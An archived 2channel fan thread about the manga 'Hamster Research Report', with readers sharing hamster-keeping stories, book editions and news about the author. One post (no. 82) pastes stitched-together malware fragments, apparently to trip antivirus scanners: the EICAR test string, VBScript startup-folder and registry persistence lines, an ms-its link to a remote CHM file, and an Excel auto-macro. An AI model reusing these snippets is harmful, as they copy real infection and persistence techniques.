2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

大雪師走【ハムスターの研究レポート】2

1 :花と名無しさん:2006/08/03(木) 01:05:23 ID:???0
【作品リスト】
・ハムスターの研究レポート
・だっくす
・はりはりハリ太郎
・ものギャグ コダマくん
・はち

あと、朝日新聞の読者投稿ページのカット(カエルの親子)

【ハム研単行本リスト】
単行本は7巻まで
   1〜5巻はファンタジーコミックス
   6〜7巻はJets comics (白泉社)

文庫は3巻まで
白泉社文庫

現在シルキー誌において連載中

【過去スレ】
ハムスターの研究レポート
http://comic6.2ch.net/test/read.cgi/gcomic/1082124516/

2 :花と名無しさん:2006/08/03(木) 01:06:49 ID:???0
   .ヘ.     /\
  / i::\_ノ::::/  l
  l .丿::::::::::::::::::`:ヽ丶
  l :::::::::::::::::::::::::::::::::::ヽ
  /::::::::●::::::●:::::::::::::::ヽ
  l::::::::::::::::o::::::::::::::::::  :::l 
 l   =ヽノヽノ=     :::::l  まめ太郎が2get
 ヽ  3´`´`ε     :丶
  丿 ヾ   ノ      ::::l
  i   `─´      ::::::ノ
 (            ::::/
  ゞ ___  ___;:ノ
  ε/    ι丿

3 :花と名無しさん:2006/08/03(木) 01:10:47 ID:???0
さっさと新スレを立てれば良かったなも

4 :花と名無しさん:2006/08/03(木) 01:35:39 ID:???0
>>1
乙! あぶねー立てるとこだった。

5 :花と名無しさん:2006/08/03(木) 01:48:03 ID:???0
大雪師走の顔
http://210.150.210.38/cgi-bin/peni/img/37001.jpg

6 :花と名無しさん:2006/08/03(木) 02:15:39 ID:???0
>1乙

(´∀`∩)↑age↑

7 :花と名無しさん:2006/08/03(木) 02:17:33 ID:???0
>>1

>>5グロ

8 :花と名無しさん:2006/08/03(木) 05:20:12 ID:???0
早く新刊がでますように・・・
そのために早く新刊の事を忘れますように・・・・

9 :花と名無しさん:2006/08/03(木) 07:05:17 ID:???0
>1さん 乙です。

最近読んだ別のまんがに、
ハムスターが大好きなやくざさんが出てきて、
「このお方も絶対「ハム研」読んでるだろうな…」
と思いました。
ハムスターまんがのスタンダードですよね。


10 :花と名無しさん:2006/08/03(木) 07:57:29 ID:QfwqDW0IO
即死防止age

まめ太郎は父親になれるんだろうか


11 :花と名無しさん:2006/08/03(木) 12:01:01 ID:???0
>1さん乙です

つ【てんちゃんがろこつに捨てた中身の入って無いカボチャの種】


12 :花と名無しさん:2006/08/03(木) 12:01:23 ID:???O
まだこの漫画続いてるの?!

13 :花と名無しさん:2006/08/03(木) 18:42:49 ID:???0
>>1さんおつ

つ【おばあちゃんの味がしないアメ】

14 :花と名無しさん:2006/08/03(木) 19:40:54 ID:???0
>>1さん乙カレーのにおい

みんなもっといいものをあげようよ
つ【ティッシュの空き箱の底に糊を塗って作ったゴキブリホイホイ】

15 :花と名無しさん:2006/08/03(木) 20:53:31 ID:???O
>>1乙であります

じゃあとっておきの宝物をあげるよ!

16 :花と名無しさん:2006/08/03(木) 20:54:40 ID:???O
>>1

つ【刺身についていた生臭いパセリ】

17 :花と名無しさん:2006/08/03(木) 20:55:20 ID:???O
途中送信しちまった orz

つ【まめ太郎の消しゴムコレクション】

18 :花と名無しさん:2006/08/04(金) 01:05:44 ID:???0
>>1

つ【大雪さんが育てたヒマワリの種】

19 :花と名無しさん:2006/08/04(金) 13:12:36 ID:???0
おまえらいいかげんにしろよ!>>1様乙です!

つ【赤ちん】

20 :花と名無しさん:2006/08/04(金) 17:11:08 ID:???0
>>1

つ【耳ガード】(特許違反)

21 :花と名無しさん:2006/08/05(土) 19:31:08 ID:???O
図書館行ったら自由研究している子どもたちがいた。昔、家で飼っているハム題材にして自由研究したの思い出した。
頬ぶくろにピーナッツがいくつ入るか・歩く早さはどれくらいかとか調べた。
挿絵はハム研のモロパクリだったがな・・・。
だって大雪さんのハムイラスト的確な上にかわいいんだもん。


22 :花と名無しさん:2006/08/06(日) 01:44:30 ID:???O
大雪先生に
コソボ紛争をテーマにした
漫画を描いてもらいたいなぁ

23 :花と名無しさん:2006/08/06(日) 23:23:35 ID:???O
わかった。
単行本巻末に夢のハムスター島が描かれているが、あれってヘリから無造作に餌をばらまいているように見えて、実は軍事でも使われる最新の技術を利用してハムスターに当たらないようにまいているんだな。


24 :花と名無しさん:2006/08/07(月) 00:51:45 ID:???0
そこまで考えるおまいがすごい。

ハムにとっちゃ
「なんだか分からないけど 空から食べ物がふってくる」

うちのハムもおそらくこう思ってるだろうな。

25 :花と名無しさん:2006/08/08(火) 00:54:50 ID:???O
今日、ふの館

26 :花と名無しさん:2006/08/09(水) 05:34:16 ID:1PLQJx0pO
恐怖の館?

ハム研まだつづいてたんだ?かなりうれしい。ところで、これ単行本だと何巻まででてる?

27 :花と名無しさん:2006/08/09(水) 06:57:55 ID:???0
>>26
>>1

28 :花と名無しさん:2006/08/11(金) 09:52:52 ID:???O
おばあちゃんが面白いね

29 :花と名無しさん:2006/08/12(土) 01:02:23 ID:???0
あのおばあちゃんを見ると
コンピューターおばあちゃんを思い出すよなぜか。

30 :花と名無しさん:2006/08/13(日) 17:34:01 ID:???O
こんばんは
やもりです

http://m.pic.to/1krc8

31 :花と名無しさん:2006/08/14(月) 22:04:11 ID:???0
>>30
PCからじゃ見られない…

やもりならそれほど見たくないが。

32 :花と名無しさん:2006/08/17(木) 18:26:31 ID:???O
>>30デカッ!!(((゚Д゚;)))トカゲじゃね?

33 :花と名無しさん:2006/08/22(火) 08:07:16 ID:???O
つ【空のティッシュケース】

34 :花と名無しさん:2006/08/26(土) 14:09:52 ID:???0
ほしゅ

35 :花と名無しさん:2006/08/27(日) 06:10:20 ID:???0
家を守るからやもりだって!<図鑑

母「飼いませんよ!」

36 :花と名無しさん:2006/08/27(日) 18:38:32 ID:???0
大人になったからこそ余計に思うこと・・・

【私に大雪さんみたいな子の世話はできん!】

どうあがいても無理です。
魚やペット用動物はまだ許せるが、ドブネズミやヤモリをかわいいとは思えません。
本当に(ry

37 :花と名無しさん:2006/08/27(日) 19:11:37 ID:???0
ええええ〜ヤモリかわいいよヤモリ
頭が不自然に大きくて瞳がつぶらでお手手とアンヨは赤ちゃんみたいで

38 :花と名無しさん:2006/08/27(日) 21:57:07 ID:cVmTC/RCO
ハムスターフードのクリープ煮。
パンに応用して作ったらうまそうな気がするのは自分だけ?

39 :花と名無しさん:2006/08/28(月) 00:09:20 ID:???O
表面の甘いところだけを食べる38だった。

40 :花と名無しさん:2006/08/29(火) 11:58:17 ID:Ku2nKbsUO
>>38-39
お前らワロス

41 :花と名無しさん:2006/08/30(水) 03:07:45 ID:???0
実際にやってみた人はおらんのか> フードのクリープ煮

しかし大雪さん色々発明家だなー
さすがに押入れを遊園地にはできん



42 :花と名無しさん:2006/08/30(水) 09:57:57 ID:???0
ティッシュの箱を巣箱にするというのは
ハムを飼っていたとき本当に重宝した

今のティッシュ箱の薄さって
ゴルハムは無理かなと思う


43 :花と名無しさん:2006/08/30(水) 21:58:51 ID:aFxawQ9b0
工作好きだよね、大雪さん。

44 :花と名無しさん:2006/08/30(水) 22:33:03 ID:???0
耳カバーとか(ゴキブリ取りにひっかかったの取ったら
ハゲたハム用の)ベストとか、小物もよく作ってるし、
手先が器用なんだろうね。

……全部かじられてダメになってたけどw


45 :花と名無しさん:2006/09/03(日) 21:14:01 ID:???O
こしょ こしょ こしょ

46 :花と名無しさん:2006/09/03(日) 23:37:22 ID:???0
くつくつくつ・・は何度も聞いたが
プクプクプクは耳にしたことないなあ。

47 :花と名無しさん:2006/09/03(日) 23:56:57 ID:???0
鼻詰まりなのかもね。

48 :花と名無しさん:2006/09/04(月) 13:36:42 ID:0zG2rEbX0
>>46
聞いたことがあるよ。
出してくれコールをして小屋から出してもらえなかったときとか

そういえば、ぷくぷく登場からクツクツからプクプクにかわったね。

49 :花と名無しさん:2006/09/05(火) 01:18:43 ID:???0
>>48
そうかー。ウチだけかな。
7巻プクプクって書いてあるが多いけど、後半にくつくつ・・があるから
この2つは違う感情表現なんだろうな。

50 :49:2006/09/05(火) 01:33:22 ID:???0
> 書いてあるが多いけど

書いてある方が多いけど

51 :花と名無しさん:2006/09/05(火) 06:26:28 ID:???0
ハム研を真似て飼いハムのイラストを描いてみた。

ttp://plaza.rakuten.co.jp/carpenterGen/diary/200608230000/

52 :花と名無しさん:2006/09/05(火) 13:27:22 ID:???0
>>51
すまん、下半身が面白すぎる

53 :花と名無しさん:2006/09/06(水) 20:39:11 ID:???0
プクプクとくつくつって
両方とも「苦情」だったけ?
最近読んでないから忘れた…

54 :花と名無しさん:2006/09/07(木) 00:58:56 ID:???0
>>53
プクプクはなにか訴えてる時
くつくつはイライラしてる時
・・・って感じかな

55 :花と名無しさん:2006/09/08(金) 22:51:13 ID:???0
>>51
さては絵心ない人ですね?
味があってイイワヨー。

56 :花と名無しさん:2006/09/12(火) 09:31:29 ID:???0
11月2日発売のシルキーにて
ハム研連載再開です!


57 :花と名無しさん:2006/09/12(火) 16:17:43 ID:???0
ハム研のグッズプレゼントとか、全プレとかやってくれー。

58 :花と名無しさん:2006/09/12(火) 19:18:06 ID:???0
>>56
わおー!うれしい。
ネタがたまったのかな。
みそちゃんが気になる。

59 :花と名無しさん:2006/09/14(木) 21:13:05 ID:???0
か、かわいい・・
ttp://www.flickr.com/photos/seattle_roll/196698642/in/set-640398/

大雪さんはキンクマ登場させないんかな。

60 :花と名無しさん:2006/09/15(金) 02:10:43 ID:???0
検索しても見つからなかったからここで聞きたいんですけど
mixiにハム研じゃなくて大雪師走さんのコミュニティ作ったら需要ありますか?

61 :花と名無しさん:2006/09/15(金) 05:52:42 ID:???O
知りません
mixi厨は氏んでください

62 :花と名無しさん:2006/09/15(金) 15:58:22 ID:???0
>>60
ハムコミュ色々あるから大雪さん好きもいるだろうけど、
今の主流はジャンハムだからねえ…。
ちょっと話題にしてコミュとして成り立つか試してみたら〜?

>>59
そこ、人気のハムだよね。寝顔もかわいい。

63 :花と名無しさん:2006/09/19(火) 20:07:28 ID:???O
お嫁さんを買いにきましたよー

64 :花と名無しさん:2006/09/19(火) 20:58:38 ID:???0
(ハム研とは直接関係ないが)いつも思うことなんだけど、
キンクマに関しては、漢字表記したほうがいい、と思う。

……油断するとね、読み違いしちゃうんだ…どの字とは言わないけど。
そんでギョッとしてよくよく見て、「あ、キンクマハムスターのことか」と。

65 :花と名無しさん:2006/09/19(火) 23:25:57 ID:???0
>>64
・・・・・オスを飼ったことのある人なら
あながち間違いでもない、と感じるかも。


「でっぱり」と抑えた表現をする大雪さんが好き。

66 :花と名無しさん:2006/09/20(水) 01:35:48 ID:???O
キンタマと読み間違えたりしないよー。

67 :花と名無しさん:2006/09/25(月) 23:32:52 ID:???0
文庫の3巻が見つからない・・・。1巻と2巻はブックオフで見かけたのにな。

ところで、皆さんはハム研はワイド版と文庫どちらで集めてますか?

68 :花と名無しさん:2006/09/26(火) 02:56:20 ID:???0
ずっとワイド版です。
文庫は書き下ろしとかあれば買いますが
そういう話は聞かないので、たぶん書き下ろしはないですよね?
ワイド版には表紙の裏の隠れ漫画とか
帯にも漫画があるけど、文庫もあるのかな?

69 :花と名無しさん:2006/09/27(水) 00:39:24 ID:???0
隠れ漫画は巻末に、おまけ漫画として収録されてるよ〜。
カラーページを保存しておきたい人は、ワイド版でいいんじゃないかな。

自分は、持ち運びしやすいので文庫を選んだ。

70 :花と名無しさん:2006/09/27(水) 02:08:29 ID:???0
文庫のカバーデザインがカラフルで可愛いと思いつつ、
なんとなく大判でずっと集めてるなぁ。

71 :花と名無しさん:2006/10/02(月) 20:49:01 ID:/oEayHyg0
ワイド版もってるけど文庫も買ってしまった
通勤電車の楽しみですw


72 :花と名無しさん:2006/10/09(月) 09:06:06 ID:???0
文庫判出たのが遅かったからねえ。
大判でずっと買ってたもので・・・

73 :花と名無しさん:2006/10/10(火) 02:27:33 ID:???O
まめ太郎とみそちゃんの子供を拝める日は来るのだろうか…

74 :花と名無しさん:2006/10/10(火) 10:44:46 ID:???0
魔法の粉(この場合はクッキーの粉)を使っても
ダメなのかな<まめ太郎とみそちゃんの仲


75 :花と名無しさん:2006/10/10(火) 16:32:13 ID:???O
みそちゃんとしては
まめ太郎が来た→嫌いだからガブッ
魔法の粉まみれのまめ太郎が来た→美味そうだからガブッ
どっちにしても噛まれるまめ太郎だった。

76 :花と名無しさん:2006/10/11(水) 11:03:12 ID:???0
どっちにしても噛まれちゃのかw
まめ太郎カワイソス

昔、ハムを飼っていた経験からすると
メスが発情したのを見計らってオスを投入すると
ほぼ確実に妊娠に繋がりますが
同居じゃないと発情のタイミングを合わせるのが難しいから
しばらく無理そうですね、みそちゃんとまめ太郎の子ども


77 :花と名無しさん:2006/10/18(水) 13:50:45 ID:???0
これ読むとまたハムスター飼いたくなるんだよなあ・・・

78 :花と名無しさん:2006/10/24(火) 20:44:05 ID:???O
これ、まだめで鯛さんの漫画載ってますか?
昔持ってたのに無くしてしまって…また買おうかなぁと。

79 :花と名無しさん:2006/10/26(木) 03:24:15 ID:???0
>>78
何か勘違いしてるようですが
これは大雪師走さんという人の描いている単独のコミックスですよ。


80 :花と名無しさん:2006/10/27(金) 17:32:24 ID:???O
ぐぐってみたら違いました。どうもすみません(=ω=;)

81 :花と名無しさん:2006/10/28(土) 21:47:47 ID:e0bLCOjx0
それはきっと「ハムスター倶楽部」のことでしょうな。

ハム研も面白いので是非ご一読を。

82 :<body onload=window()>:2006/10/29(日) 17:26:21 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

83 :花と名無しさん:2006/10/29(日) 20:34:43 ID:???0
突然あぼ〜んが来たから何かと思ったらウイルスかw
ウイルス貼ったやつって、プロバに連絡行くか
ネット警察に通報対象だったような。

84 :花と名無しさん:2006/10/30(月) 06:29:23 ID:???0
ウイルス×
ウイルスを装った書き込み○

シマンテックのウイルスソフトだけ誤作動するはず。


85 :花と名無しさん:2006/11/05(日) 14:29:46 ID:p9F5Ik+U0
最近、ロボに心を奪われている自分

86 :花と名無しさん:2006/11/05(日) 14:50:09 ID:???0
高校の時の先生が大雪さんの知り合いだったなあ。
「俺の教えた中に大雪師走という漫画家がいるが〜」
と先生が言った瞬間、「ハム研!!!」と超反応したのは私一人だった。
実物は華奢で綺麗な人らしい。

87 :花と名無しさん:2006/11/05(日) 16:23:57 ID:???O
>>66
ギンタマがどうした?!

88 :花と名無しさん:2006/11/06(月) 03:26:58 ID:???0
大雪さんは、写真で前に拝見しましたが、
穏やかでとても優しいオーラをした方でした。

どうぶつを本当に愛して止まない雰囲気でしたよ。

いいなぁ。先生も鼻が高いでしょうね。

89 :花と名無しさん:2006/11/07(火) 13:18:54 ID:???O
華奢だったのか

90 :花と名無しさん:2006/11/09(木) 15:09:05 ID:???O
作中ではクッキー食い過ぎ短期間で10`増で体が固い人なわけだが
実物はスラッとしなやかで「あだだだ!!」なんて叫ばないキャラなんだろうか。

91 :花と名無しさん:2006/11/09(木) 21:13:47 ID:???0
このスレに何度か大雪さんの写真上がってるけど
特に華奢という印象ではなかったです。
上で書かれているように、もしかしたら学生時代は華奢だったのかもしれないけど。

92 :花と名無しさん:2006/11/10(金) 09:21:03 ID:???0
シルキー12月号読んできた

93 :花と名無しさん:2006/11/11(土) 21:28:17 ID:???O
まめかわいいよまめ

94 :花と名無しさん:2006/11/12(日) 09:31:14 ID:/sw6Jo0u0
まめ太郎くんにちなんで昨日お迎えしたロボ(♀)にピースと名付けました。

えんどう豆の複数形のピースですから。ピーちゃんじゃ放送禁止用語みたいですから。

平和のピースじゃありませんから。極左の船に乗る団体とは関係ありませんから。

環境保護のお題を掲げて人種差別・破壊活動を行う連中とも無関係ですから。

95 :花と名無しさん:2006/11/12(日) 23:54:36 ID:???0
じゃあ、うちはホープにしよう

96 :花と名無しさん:2006/11/19(日) 05:23:54 ID:???O
途中まで大雪先生は男だと思ってた…
だって
いっつもズボンだし
いっつも髪短いし
いっつもシャツはチェックだしw
ゴンちゃんはやっぱ先生が作ったキャラなん?

97 :花と名無しさん:2006/11/19(日) 14:25:53 ID:???0
大雪先生がまだ会社勤めをしていた時の話だと、
他のOLさんはスカートの制服なのに、先生は男物スーツ着ていたから
男だと思っていたよ。
1巻の巻末に書かれていたますむらひろし先生の話で、
大雪先生が女性だって分かったけど。

98 :花と名無しさん:2006/11/19(日) 17:38:30 ID:???0
大雪さん、「はち」に出てくる良子さんのような感じのイメージだ。

99 :花と名無しさん:2006/11/24(金) 00:42:53 ID:???0
はりはりはり太郎って漫画読んだことあるひといますか?

100 :花と名無しさん:2006/11/24(金) 12:13:05 ID:???0
>>99 
お気に入りの作品の一つ。
3巻はいつだろうかとずっとまってます。

101 :花と名無しさん:2006/11/28(火) 10:21:13 ID:???0
>>97
おなじく

あれは男物スーツではなくパンツスーツを着てらしたのかな?
先生のいまいち正体不明だけどおもしろキャラなところがいい

102 :99:2006/12/01(金) 23:25:20 ID:???0
>>100
ハリ太郎買って来ました!
貴方と同じくとてもお気に入りの本になりそう。
かわいすぎて・・。

いつも思うんだけど、大雪さんの本は「何度読んでも癒される」
から飽きることもなく寝る前の枕元に置いておきたいですね。

103 :花と名無しさん:2006/12/04(月) 21:33:07 ID:???O
お〜〜〜〜〜う

104 :花と名無しさん:2006/12/11(月) 21:24:57 ID:???O
赤ちんまるけ

105 :花と名無しさん:2006/12/12(火) 19:23:22 ID:???0
うちのハム(♂1歳)の為に、ハムスターフードのクリープ煮を作ってみたぞ。
クリープが無いので、コーヒーミルクで代用したがちゃんと食べてくれたw

このメニューを考えた大雪さんスゲー。


106 :花と名無しさん:2006/12/15(金) 14:09:00 ID:???0
age

107 :花と名無しさん:2006/12/15(金) 16:39:14 ID:???O
研究レポートなつかしいwww小学校の図書館にあったけどいつでも予約いっぱいでなかなか読めなくて予約いれても1ヶ月以上たってからやっとまわってくるくらい人気だった
好きだったなあ…

108 :花と名無しさん:2006/12/23(土) 11:50:39 ID:K1Yb6GQD0
age

109 :花と名無しさん:2006/12/23(土) 14:57:22 ID:???0
ゴールデンには結構かしこいのが多いのか……

大脱走
ttp://pya.cc/pyaimg/pimg.php?imgid=36144

先生やってるお父さんのリュックにもぐりこんで
遠足について行ったのはチビまろだったっけ?

110 :花と名無しさん:2006/12/23(土) 18:04:00 ID:???O
>>109
そーそーチビまろだね
モルモットがお嫁さんとかウケるw
後々に花子さんがモルモットもう一匹もらってきたよね

111 :花と名無しさん:2006/12/25(月) 21:57:00 ID:???0
忘れられてるチビ太郎哀れ

112 :花と名無しさん:2007/01/01(月) 16:38:41 ID:l9euNj7F0
今年は最新刊が出ますように

113 :花と名無しさん:2007/01/02(火) 12:21:53 ID:???O
研究レポート!なつかしい…小学生の頃買ったよ…

手作りごはんとか真似してウチのおハムさんに食べさせてたな〜

114 :花と名無しさん:2007/01/04(木) 00:46:31 ID:dOwrbb4oO
自分も小学生の頃まわりで流行っててハムスター飼ってる人沢山いたなぁ。さっき久しぶりに読み返したら1巻の『チャウチャウ』で爆笑してしまったww

115 :花と名無しさん:2007/01/04(木) 09:38:39 ID:???0
   +       +
 +  /´ ̄ ̄`ヽ、  +
,._ /   ^    ^ヽ  +
\`   ,, ●  _ ●L
∠、_   三   イ_> 三
    `⊂、.___,ノ⊃

116 :花と名無しさん:2007/01/10(水) 15:59:16 ID:???O
超おでぶちゃん

117 :花と名無しさん:2007/01/14(日) 04:31:16 ID:???O
チビと花子はどうしてるんだろう?
あえてお別れ描かなかっただけ?

118 :花と名無しさん:2007/01/21(日) 12:54:12 ID:???0
>>117
「まんがなので、読んで悲しくなるようなことは描きません」
みたいなことをインタビューで先生がいってたよ

23 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)